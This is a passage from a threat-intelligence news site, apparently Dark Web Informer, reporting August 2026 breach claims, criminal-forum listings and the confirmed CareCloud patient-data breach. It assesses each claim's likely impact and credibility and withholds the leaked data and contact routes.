a French company renting construction, industrial and handling equipment, comprising **43GB across 132,433 files**. The actor labels this the **eleventh release in a numbered series** and states openly that the source is **BlgCloud**, a shared business management platform, confirming the common origin that identifiers in earlier releases had only implied. The material spans **full email content, CRM contact records with coordinates and financial exposure fields, and invoice documents**. The actor has again named the **next target** for release the following day. The claim is **unverified**. Severity HIGH [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Volume43GB Files132,433 SeriesRelease 11 ActorChimeraZ ### ▣Post details Targetbergerat-rent.com Country![France flag](https://flagcdn.com/w40/fr.png)France SectorEquipment rental ListingFree, reply to unlock Volume43GB, 132,433 files Stated sourceBlgCloud platform ObservedAug 20, 2026 ActorChimeraZ ### !Allegedly included - Full email message content - Sender and recipient details - Email attachments - CRM contact records - Business and personal names - Job titles - Postal addresses - Geographic coordinates - Contact email addresses - Bank account detail fields - Outstanding credit limits - Insurance exposure fields - Invoices and PDFs - Document file hashes ### ◱Screenshot [ ![Bergerat Rent France BlgCloud platform database leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/978235978623598762359876239578623.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/978235978623598762359876239578623.png) ### ⚠Potential impact For the named company the exposure is the same shape as earlier releases in this series and no less serious for being business data. **Full email content lays open commercial terms, pricing and correspondence with customers and suppliers**, while CRM records tie named contacts to addresses and coordinates and carry **credit limits, insurance exposure and banking detail fields** that describe a counterparty's financial position. Combined with the invoice set, this supports **invoice fraud and business email compromise** against the company and everyone it trades with, since a fraudulent demand can quote real references and real threads. The wider point is now explicit rather than inferred: **every organisation on the same platform faces the same exposure**, releases are continuing on a daily cadence, and the next company has already been named. ### iStatus Unverified This release closes a gap in the earlier reporting. When this series was at its sixth entry, the shared origin was **inferred from platform identifiers appearing inside a tenant's records**; the actor now names the provider directly, and the samples here again carry the operator's own support contact records inside the tenant data. That is consistent with **a single upstream compromise rather than eleven unrelated ones**, though the provider has still not been confirmed as the source and has not commented. Dark Web Informer is **not reproducing the download location, the contact route, or the named individuals, addresses and message content** in the samples. The claim is **unverified** and neither Bergerat Rent nor the platform operator has publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### French Restaurant Platform FrenchInnov Allegedly Scraped, Exposing Client Credentials and Live Payment Keys URL: https://darkwebinformer.com/french-restaurant-platform-frenchinnov-allegedly-scraped-exposing-client-credentials-and-live-payment-keys/ Last updated: 2026-08-20T19:00:55.000Z Breach Report ![France flag](https://flagcdn.com/w40/fr.png)France Restaurant Software / Supply Chain Free Download ## French Restaurant Platform FrenchInnov Allegedly Scraped, Exposing Client Credentials and Live Payment Keys A forum user posting as **Alduin** claims to have scraped the CRM behind **frenchinnov.fr**, a French platform that centralises restaurant operations including point of sale, stock, staff planning, loyalty and delivery platform integration. The set is small at roughly **1,600 client records across two JSON files**, but the contents are not. A free text notes field carries, in plain view, **remote access passwords, database server credentials, email account passwords and live payment gateway secret keys** belonging to the restaurants themselves. Records also include business identifiers, addresses and terminal hardware references. The actor states the data was **scraped rather than extracted through an intrusion**. The claim is **unverified**. Severity CRITICAL [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) Client records1,600 CredentialsIn plain text Datasets2 JSON files ActorAlduin ### ▣Post details Targetfrenchinnov.fr Country![France flag](https://flagcdn.com/w40/fr.png)France SectorRestaurant management SaaS ListingFree, reply to unlock Volume883KB plus 1,067KB JSON MethodClaimed scraping ObservedAug 20, 2026 ActorAlduin ### !Allegedly included - Business names and branding - Client reference codes - Business street addresses - Phone numbers - Contact email addresses - Remote access passwords - Database server credentials - Email account passwords - Live payment secret keys - Publishable payment keys - Point of sale terminal IDs - Kiosk and screen device refs - SIREN and SIRET numbers - VAT registration numbers ### ◱Screenshots [ ![FrenchInnov France restaurant CRM data leak forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/9823589762379856928376598273598723.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/9823589762379856928376598273598723.png) [ ![Claimed record structure for the second FrenchInnov dataset](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/9823589762379856928376598273598724.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/9823589762379856928376598273598724.png) ### ⚠Potential impact The record count is trivial and the severity is not, because this is **a supplier exposure that hands over the customers rather than the supplier**. Support notes appear to have been used as a credential store, so a single file reportedly yields, per restaurant, the password to **take remote control of the till system, the login to its database, the mailbox password, and the secret key to its payment account**. A live payment secret key is an instrument rather than a record, allowing an account to be read and refunds to be issued until it is rotated. Remote access to a point of sale terminal is worse still, since it puts an attacker on the device that handles cards in person. Every affected restaurant should treat **every credential ever shared with the vendor as burned** and rotate payment keys, remote access passwords, database logins and mailbox passwords now, regardless of whether the claim is later confirmed. ### iStatus Unverified The word the actor uses matters. **Scraping implies an interface returning client records to whoever asked**, rather than a break in, which would point to a missing authorisation check on a CRM endpoint and would mean the door may still be open. The samples are internally consistent and the field structures match a French business context, with company registration and VAT identifiers formatted correctly. Those identifiers are matters of public record in France, so **the harm sits in the credentials beside them, not in the company data itself**. Dark Web Informer is **not reproducing the credentials, payment keys, terminal identifiers or client details** visible in the samples. The claim is **unverified** and the vendor has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Wrappiness Customer Database Allegedly Offered for Sale With 3 Million Order Records URL: https://darkwebinformer.com/wrappiness-customer-database-allegedly-offered-for-sale-with-3-million-order-records/ Last updated: 2026-08-20T18:25:39.000Z Breach Report ![United States flag](https://flagcdn.com/w40/us.png)United States E-commerce / Personalised Gifts $2,000 USD ## Wrappiness Customer Database Allegedly Offered for Sale With 3 Million Order Records A forum user posting as **Satanic** is selling what they describe as the full database of **Wrappiness.co**, a United States retailer of personalised and custom gifts including wood signs, ornaments and keychains. The listing claims **three million user records and 115 administrator accounts**, and dates the intrusion to **August 18, 2026**, two days before posting. Published field lists show order records carrying **names, email addresses, phone numbers and full billing and shipping addresses**, alongside purchase values, carrier tracking numbers and the personalisation details attached to each item. Administrator records include hashed passwords and permission sets. The asking price is **$2,000**. The claim is **unverified**. Severity HIGH [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) User records3M Admin accounts115 Asking price$2,000 ActorSatanic ### ▣Post details TargetWrappiness.co Country![United States flag](https://flagcdn.com/w40/us.png)United States SectorCustom gift retail ListingSelling, escrow accepted Volume3M users, 115 admins Breach dateStated as Aug 18, 2026 ObservedAug 20, 2026 ActorSatanic ### !Allegedly included - Customer full names - Email addresses - Phone numbers - Full shipping addresses - Billing addresses - Company names - Order values and costs - Purchased item details - Personalisation content - Uploaded photo references - Carrier tracking numbers - Referring social profiles - Platform risk scores - Admin hashes and permissions ### ◱Screenshots [ ![Wrappiness.co United States customer database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2839756987236987641298765987611.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2839756987236987641298765987611.png) [ ![Claimed user and administrator field lists in the Wrappiness listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2839756987236987641298765987612.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/2839756987236987641298765987612.png) ### ⚠Potential impact No card numbers appear in the published schema, and administrator passwords are stored as **bcrypt hashes rather than in the clear**, which limits the worst outcomes. What remains is a large and unusually descriptive consumer set. Each record reportedly ties a **named person to a home address, phone number and email, plus what they bought and who they bought it for**. Personalised goods make that last part meaningful, because the customisation text and uploaded images can reveal family names, pets, dates and relationships that ordinary retail orders do not. That supports **convincing delivery and order confirmation scams**, since an attacker can cite a real item, a real tracking number and a real recipient. The administrator set is the operational concern: **115 accounts with defined permissions and last seen timestamps** would give an attacker a map of internal roles even if the hashes hold. ### iStatus Unverified The evidence is stronger than a bare claim: the seller publishes **complete field lists for both collections and record samples that match them**, and the structure is consistent with an order management layer sitting over a storefront platform rather than the storefront itself. The three million figure is the seller's own and is not broken down between orders and unique customers, which matters for a retailer where repeat purchases are common, so **the number of distinct people affected may be materially lower**. The same account offered a separate collection of merchant payment data days earlier. Dark Web Informer is **not reproducing the samples, which contain complete customer identities, nor the contact route**. The claim is **unverified** and the retailer has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Developer Sought on a Breach Forum to Build a Mexican KYC Bot Capturing ID Scans and Face Biometrics URL: https://darkwebinformer.com/developer-sought-on-a-breach-forum-to-build-a-mexican-kyc-bot-capturing-id-scans-and-face-biometrics/ Last updated: 2026-08-20T18:29:43.000Z Recruitment Watch ![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Telecom / Identity Verification Hiring Post ## Developer Sought on a Breach Forum to Build a Mexican KYC Bot Capturing ID Scans and Face Biometrics A member posting as **Cookiegen131** is recruiting a developer to build a **Telegram based identity verification system for a stated Mexican telecom project**. The specified flow collects **front and back images of the INE national identity card**, runs OCR validation, then opens a live camera session for **liveness checking and face comparison against the document**, before passing the result to a telecom registration workflow. The request is technically ordinary and the post carries an **unusually explicit instruction against deepfakes, spoofing or anything designed to defeat a verification provider**. Nothing in the specification is inherently illegitimate. The venue, and what the finished system would accumulate, are why it is worth noting. Concern ELEVATED [ ![WhiteIntel sponsor banner](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/2026/08/whiteintel_io_banner.jpg) ](https://whiteintel.io/?utm%5Fsource=darkwebinformer.com&utm%5Fmedium=referral&utm%5Fcampaign=whiteintel) MarketMexico DocumentsINE front and back BiometricsLiveness, face match PosterCookiegen131 ### ▣Post details TypeDeveloper recruitment Country![Mexico flag](https://flagcdn.com/w40/mx.png)Mexico Stated purposeTelecom KYC registration Front endTelegram bot plus web step Deliverables14 components listed TermsNDA offered, budget unstated ObservedAug 18, 2026 PosterCookiegen131, 7 posts ### !Specified components - Telegram bot front end - INE front and back capture - OCR document validation - Real time camera session - Liveness verification - Document to face comparison - Secure document storage - KYC state machine - PostgreSQL schema - Admin verification dashboard - Logging and audit system - Encryption at rest - Docker deployment - Sandbox with test identities ### ◱Screenshots [ ![Mexico KYC telegram bot developer recruitment forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7892365976258925987626395789287351.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7892365976258925987626395789287351.png) [ ![Listed deliverables and hiring requirements in the KYC bot recruitment post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7892365976258925987626395789287352.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/7892365976258925987626395789287352.png) ### ⚠Why it matters Whatever the intent, the finished system would **accumulate a KYC grade identity set on every Mexican citizen who passes through it**: both faces of the national identity card, the parsed data behind it, and a live face capture proving the person was present. That combination is precisely what account opening and SIM registration checks are built to demand, so **whoever controls the resulting database controls the means to pass those checks**. The delivery route compounds it, because an end user has no way to distinguish a legitimate Telegram identity bot from a harvesting one, and **the same architecture serves both without a line of code changing**. Mexican context matters too: the country's mandatory biometric SIM registry was struck down as unconstitutional in 2022, so a telecom flow requiring biometric capture invites questions about the legal basis being relied on. ### iAssessment Unverified Two readings fit the evidence and **neither can be settled from the post**. Taken at face value, this is a straightforward contracting request, and the specification argues for it: the explicit prohibition on synthetic media and bypass mechanisms, the insistence on genuine capture, and a sandbox built on fictional identities are not what someone building a harvesting funnel would normally write down. Against that, **a lawful telecom project has ordinary hiring channels available**, and recruiting on a forum devoted to breached data is a choice that needs explaining. No operator, budget or client is named, and the account is small and recent. Dark Web Informer **is not reproducing the contact handle**, and notes that **no compromise of any Mexican carrier or identity system is claimed or implied here**. Want everything on this listing? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Solana Asset Discovery Service Advertised on a Criminal Forum With Bulk Wallet Scanning URL: https://darkwebinformer.com/solana-asset-discovery-service-advertised-on-a-criminal-forum-with-bulk-wallet-scanning/ Last updated: 2026-08-19T20:18:47.000Z Tooling Watch Russian Language Forum Crypto / Asset Discovery Subscription Service ## Solana Asset Discovery Service Advertised on a Criminal Forum With Bulk Wallet Scanning A newly registered user posting as **danbalan** is advertising **Checkermax**, a subscription service that scans Solana wallet addresses for holdings not visible in a standard balance view. The advertised coverage includes **staking positions, liquidity and lending deposits, vesting, unclaimed airdrops and launchpad creator fees**, across a stated 180 protocols. Pricing is **$300 for a week or $1,000 for a month**, with forum escrow accepted. Nothing in the tool requires private keys, and asset discovery is a legitimate function on its own. The detail that makes this notable is the **bulk mode, which processes address lists in batches of 1,000**, and the venue in which it is being sold. Concern ELEVATED Weekly price$300 Monthly price$1,000 Batch size1,000 wallets Sellerdanbalan ### ▣Post details ServiceCheckermax wallet checker ChainSolana CategoryAsset discovery tooling ModelSubscription, escrow offered Coverage180 protocols, 30 checkers Seller historyRegistered May 2026, 1 post ObservedAug 18, 2026 Sellerdanbalan ### !Advertised capabilities - Hidden balance discovery - Staking position lookup - Liquidity pool positions - Lending protocol deposits - Vesting schedule detection - Unclaimed airdrop detection - Launchpad creator fees - Reclaimable account rent - Externally linked assets - Third party deposits found - Bulk parallel scanning - Batches of 1,000 addresses - Excel and CSV export - Coverage beyond public APIs ### ◱Screenshots [ ![Checkermax Solana wallet checker service advertisement forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/293875623879659273659872598721.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/293875623879659273659872598721.png) [ ![Advertised scan results interface showing bulk wallet checking output](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/293875623879659273659872598722.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/293875623879659273659872598722.png) [ ![English language capability and pricing section of the Checkermax listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/293875623879659273659872598723.png) Screenshot 3 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/293875623879659273659872598723.png) ### ⚠Why it matters Read as a portfolio tool this is unremarkable, and comparable lookups exist openly. **The batch mode is what does not fit that reading**. An ordinary holder checks a handful of their own addresses, and has no use for scanning a thousand at a time or exporting the results to a spreadsheet. That workflow fits someone holding **a large list of addresses they did not create**, working out which ones are worth acting on. Two features point the same way: the tool surfaces value that a wallet's owner may not know exists, such as **unclaimed airdrops, reclaimable rent and forgotten staking positions**, and it finds assets a third party deposited into a wallet that never interacted with them. Against a list of compromised addresses, that is a **triage layer that turns scattered access into a ranked target list**, and it explains why the venue is a criminal forum rather than a consumer app store. ### iAssessment Unverified This is **an advertisement rather than a breach, and nothing here indicates a compromise of any platform**. The capability claims are the seller's own and the performance figures shown in the interface cannot be checked. Confidence in the seller should be low: the account was **registered in May 2026, carries a single post and a small deposit**, and is offering free trial access in exchange for reviews, which is the usual pattern for building standing rather than evidence of a working product. The stated reassurance that keys and seed phrases are never uploaded is accurate for public address lookups, though it also reads as reassurance aimed at buyers who already hold such material. Dark Web Informer is **not linking the service, the support channel, or the forum**. Want everything on this listing? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### CareCloud Data Breach Exposes Medical Records of More Than 3.75 Million Patients URL: https://darkwebinformer.com/carecloud-data-breach-exposes-medical-records-of-more-than-3-75-million-patients/ Last updated: 2026-08-19T18:41:42.000Z Healthcare technology company CareCloud has confirmed that hackers stole personal information and medical records belonging to more than 3.75 million people during a cyberattack earlier this year. The latest figure represents a dramatic increase from the roughly 350,000 victims initially identified through state breach disclosures. According to [reporting from SecurityWeek](https://www.securityweek.com/carecloud-data-breach-impact-grows-to-3-7-million-individuals/), the U.S. Department of Health and Human Services updated its breach tracker on August 18 to show **3,756,469 affected individuals**. HHS subsequently confirmed that the figure was accurate and reflected the most recent information provided to the agency. ### Hackers Accessed CareCloud Environment for Six Days The incident dates back to March 2026. CareCloud initially disclosed that it detected a security incident on March 16 after experiencing a temporary network disruption in its CareCloud Health division. The disruption affected functionality and data access within one of the company’s six electronic health record environments for approximately eight hours. Further investigation determined that an unauthorized party had gained access to [a CareCloud cloud account supporting the affected EHR environment](https://www.sec.gov/Archives/edgar/data/1582982/000149315226036363/form10-q.htm). According to breach notifications subsequently filed with regulators, the attackers had access to the environment between **March 10 and March 16**. CareCloud later confirmed that the compromised infrastructure was hosted on Amazon Web Services and that the threat actor claimed to have exfiltrated databases from the environment. ### Medical, Identity and Financial Data Stolen The information compromised varies depending on the individual, but the breach involved a substantial amount of highly sensitive patient information. [TechCrunch reports](https://techcrunch.com/2026/08/19/carecloud-confirms-3-7m-patients-had-their-medical-records-stolen-in-data-breach/) that the stolen data includes names, postal addresses, Social Security numbers, medical information, and health-related information. Regulatory breach notifications also identify additional potentially compromised information, including: - Dates of birth - Driver’s license numbers - Other government-issued identification numbers - Passport information - Financial account numbers - Credit and debit card information - Health insurance information - Medical and healthcare records SecurityWeek reported that full payment card information was exposed for only a very limited subset of affected individuals. The combination of medical records, government identification information, financial details, and Social Security numbers makes the incident particularly sensitive because much of that information cannot simply be changed like a password. ### Initial Victim Count Was Far Lower When CareCloud began notifying victims in July, filings with several state attorneys general indicated that approximately 345,000 people had been affected. That number was never expected to represent the complete breach because individual state filings generally count only residents of those states. The scale became significantly clearer when the incident appeared on the federal healthcare breach tracker. The HHS entry initially listed [3,371,508 affected individuals](https://www.securityweek.com/carecloud-data-breach-impact-grows-to-3-7-million-individuals/) before being revised the following day to 3,756,469. The new total makes the CareCloud incident one of the largest healthcare data breaches reported in the United States during 2026. ### CareCloud Stores Records for Thousands of Healthcare Providers CareCloud provides electronic health record, billing, practice management, and other healthcare technology services to medical organizations across the United States. The company stores patient information on behalf of tens of thousands of healthcare providers, meaning a compromise of one centralized environment can expose data originating from numerous medical practices. In its [August SEC filing](https://www.sec.gov/Archives/edgar/data/1582982/000149315226036363/form10-q.htm), CareCloud said its forensic investigation determined that the attacker exfiltrated personally identifiable information and protected health information associated with a substantial number of individuals. The company said it found no evidence that its other platforms, divisions, systems, data, or environments were affected. ### No Threat Group Has Publicly Claimed the Attack CareCloud has not identified the attackers, and no known ransomware or extortion group has publicly taken responsibility for the breach. It also remains unclear whether CareCloud received or paid a ransom demand. The company says it found no evidence of additional unauthorized activity after March 16 and that all affected systems remain operational. CareCloud has notified affected healthcare-provider customers and is continuing to provide required notifications to patients and regulators. The incident has also resulted in multiple class-action lawsuits alleging that personal information was compromised. Those cases were consolidated in federal court in Florida in June. For affected patients, the long-term risk extends beyond conventional account compromise. Medical records, Social Security numbers, government identification information, and financial details can support identity theft, fraudulent insurance claims, targeted phishing, impersonation, and other forms of fraud long after the original breach occurred. ### Argentine Hardware Wallet Retailer Allegedly Exposed, Linking Named Buyers to Home Addresses and ID Numbers URL: https://darkwebinformer.com/argentine-hardware-wallet-retailer-allegedly-exposed-linking-named-buyers-to-home-addresses-and-id-numbers/ Last updated: 2026-08-19T16:01:25.000Z Breach Report ![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina E-commerce / Crypto Hardware Selling ## Argentine Hardware Wallet Retailer Allegedly Exposed, Linking Named Buyers to Home Addresses and ID Numbers A forum user posting as **kingloki** is offering what they describe as a complete order export from **coincustody.io**, an Argentine reseller of Trezor and Ledger hardware wallets, covering **212 orders placed between May 2025 and August 2026**. The record count is small, but the composition is unusually dangerous: the seller claims **107 customer emails, 70 DNI and CUIT identity numbers, 47 full street addresses with apartment numbers, and 34 phone numbers**, each tied to a named buyer and the specific device they purchased. Also claimed are **payment identifiers, browser IP addresses and live parcel tracking links**. Buyers are said to include corporate and foreign customers. The claim is **unverified**. Severity HIGH Customers107 ID numbers70 Orders212 Actorkingloki ### ▣Post details Targetcoincustody.io Country![Argentina flag](https://flagcdn.com/w40/ar.png)Argentina SectorCrypto hardware retail ListingSelling, direct contact Volume278 records, 3 API pulls Root causeClaimed open read access ObservedAug 18, 2026 Actorkingloki ### !Allegedly included - Customer full names - DNI and CUIT numbers - Home street addresses - Apartment and postal codes - Phone numbers - Email addresses - Payment transaction IDs - Browser IP addresses - Live parcel tracking links - Exact device models bought - Order values and dates - Payment method used - Courier and delivery data - Corporate and foreign buyers ### ◱Screenshots [ ![coincustody.io Argentina hardware wallet buyer database sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/928735697236597862539782635987235987231.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/928735697236597862539782635987235987231.png) [ ![Claimed affected entities and record structure in the coincustody listing](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/928735697236597862539782635987235987232.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/928735697236597862539782635987235987232.png) ### ⚠Potential impact The record count badly understates this one. What the set reportedly establishes is that **a named person at a specific home address, with a verified national ID and a working phone number, took delivery of a device whose only purpose is storing cryptocurrency**. That is a targeting list before it is a privacy incident, and the risk is physical as much as digital: coercive home robbery against known holders is a recurring pattern in the region. The digital exposure is severe on its own, since knowing the **exact wallet model and purchase date makes a fraudulent firmware or security notice highly credible**, and the goal of such messages is the recovery phrase, which surrenders the funds outright. The DNI and phone pairing additionally supports **identity fraud and SIM swapping**. Live courier tracking links raise the further prospect of interception while orders are still in transit. ### iStatus Unverified The post describes **read access to an order interface rather than an intrusion**, and the export is consistent with a standard storefront order pull, which points to an exposed token or misconfigured endpoint. The claim is unusually checkable given its size, and the individuals named in the samples could confirm their own records, though **that is a burden falling on them rather than on the retailer**. The seller notes buyers in the European Union and Uruguay, which would engage obligations beyond Argentina's data protection law. Dark Web Informer is **not reproducing the sample records, which contain complete identities, nor the contact route**. The same account is separately advertising paid intrusion services. The claim is **unverified** and the retailer has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Medical Imaging Backup From Beijing's 301 Hospital Offered for Sale, With an Unverifiable Headline Claim URL: https://darkwebinformer.com/medical-imaging-backup-from-beijings-301-hospital-offered-for-sale-with-an-unverifiable-headline-claim/ Last updated: 2026-08-18T17:32:49.000Z Breach Report ![China flag](https://flagcdn.com/w40/cn.png)China Healthcare / Medical Imaging Selling ## Medical Imaging Backup From Beijing's 301 Hospital Offered for Sale, With an Unverifiable Headline Claim A forum user posting as **Knox** is offering what they describe as backup data taken from the **Chinese PLA General Hospital in Beijing, commonly known as 301 Hospital**. The posted directory listing shows **13,096 files totalling 452.29GB**, made up of compressed archives and DICOM medical imaging files dated between 2024 and July 2026\. Archive names appear to carry **patient surnames**. The seller further claims the set includes scans belonging to **Xi Jinping**, and displays imaging whose header fields carry his name and a date of birth. Those fields are **freely editable text and are not evidence of whose scan it is**. The claim is **unverified**. Severity CRITICAL Volume452GB Files13,096 Coverage2024 to 2026 ActorKnox ### ▣Post details Target301 Hospital, PLA General Country![China flag](https://flagcdn.com/w40/cn.png)China SectorMilitary teaching hospital ListingSelling, serious buyers only Volume452.29GB, 13,096 files SourceClaimed imaging backup share ObservedAug 18, 2026 ActorKnox, forum owner ### !Allegedly included - DICOM imaging studies - Compressed patient archives - Patient names in filenames - Internal patient identifiers - Dates of birth - Recorded patient sex - Study dates and times - Body region examined - Scan sequence parameters - Institution name fields - Backup directory structure - Studies from 2024 onward - Two top level directories - Claimed head of state scan ### ◱Screenshots [ ![301 Hospital Beijing medical imaging data sale forum post screenshot, August 2026](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/23798569872365698236987652398787231.png) Screenshot 1 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/23798569872365698236987652398787231.png) [ ![Claimed backup directory listing of imaging archives in the 301 Hospital post](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/23798569872365698236987652398787232.png) Screenshot 2 Redacted preview ](https://storage.ghost.io/c/6b/16/6b16ac9c-cd67-432f-b0f3-bbec941084ff/content/images/size/w1304/format/webp/2026/08/23798569872365698236987652398787232.png) ### ⚠Potential impact The severity here rests on the **ordinary patients, not the marquee name**. If a genuine imaging backup has left the hospital, it concerns thousands of people whose scans are inherently identifying, since imaging carries names, birth dates and internal identifiers in its metadata and, in the case of head studies, can be **reconstructed into a recognisable face**. Medical images cannot be reissued or invalidated, and Chinese patients have no practical route to compel deletion once material is circulating abroad. A **military teaching hospital adds a second dimension**, since its patient population includes serving personnel and officials, making the set attractive for intelligence purposes rather than fraud alone. The named claim is best treated as marketing: it raises the asking price and the attention the thread receives, and it is **the element least susceptible to proof**. ### iStatus Unverified Two points deserve weight. First, the **patient name in a DICOM file is an ordinary text field that anyone holding the file can rewrite**, so imaging displaying a public figure's name proves nothing about the patient, and the sample is viewed through trial software that would not validate anything. Second, the thread carries a **verified marker, but the poster is the forum's owner and administrator**, so that badge reflects the seller's own platform rather than independent scrutiny. The directory listing is plausible and its timestamps are internally coherent, which supports the existence of an imaging archive without establishing where it came from. Dark Web Informer is **not reproducing the imaging, the patient names, the identifiers, or the contact routes**. The claim is **unverified** and the hospital has not publicly addressed it. Want everything on this breach? **Paid subscribers** get the full claim details and more. Check out the [threat feed](https://darkwebinformer.com/threat-feed/), then after subscribing, search there for this alert. [View pricing →](https://darkwebinformer.com/pricing) [DARK WEB INFORMER](https://darkwebinformer.com/) \- THREAT INTELLIGENCE ### Merchant Data From Hundreds of Stripe Accounts Allegedly Exported Using 1,033 Compromised API Keys URL: https://darkwebinformer.com/merchant-data-from-hundreds-of-stripe-accounts-allegedly-exported-using-1-033-compromised-api-keys/ Last updated: 2026-08-18T16:29:44.000Z Breach Report Multiple Countries E-commerce / Payment Credentials Free Download ## Merchant Data From Hundreds of Stripe Accounts Allegedly Exported Using 1,033 Compromised API Keys A forum user posting as **Satanic** has published what they describe as **662 datasets totalling 33GB**, exported from Stripe merchant accounts using **1,033 compromised API keys**. Despite the thread title, the post 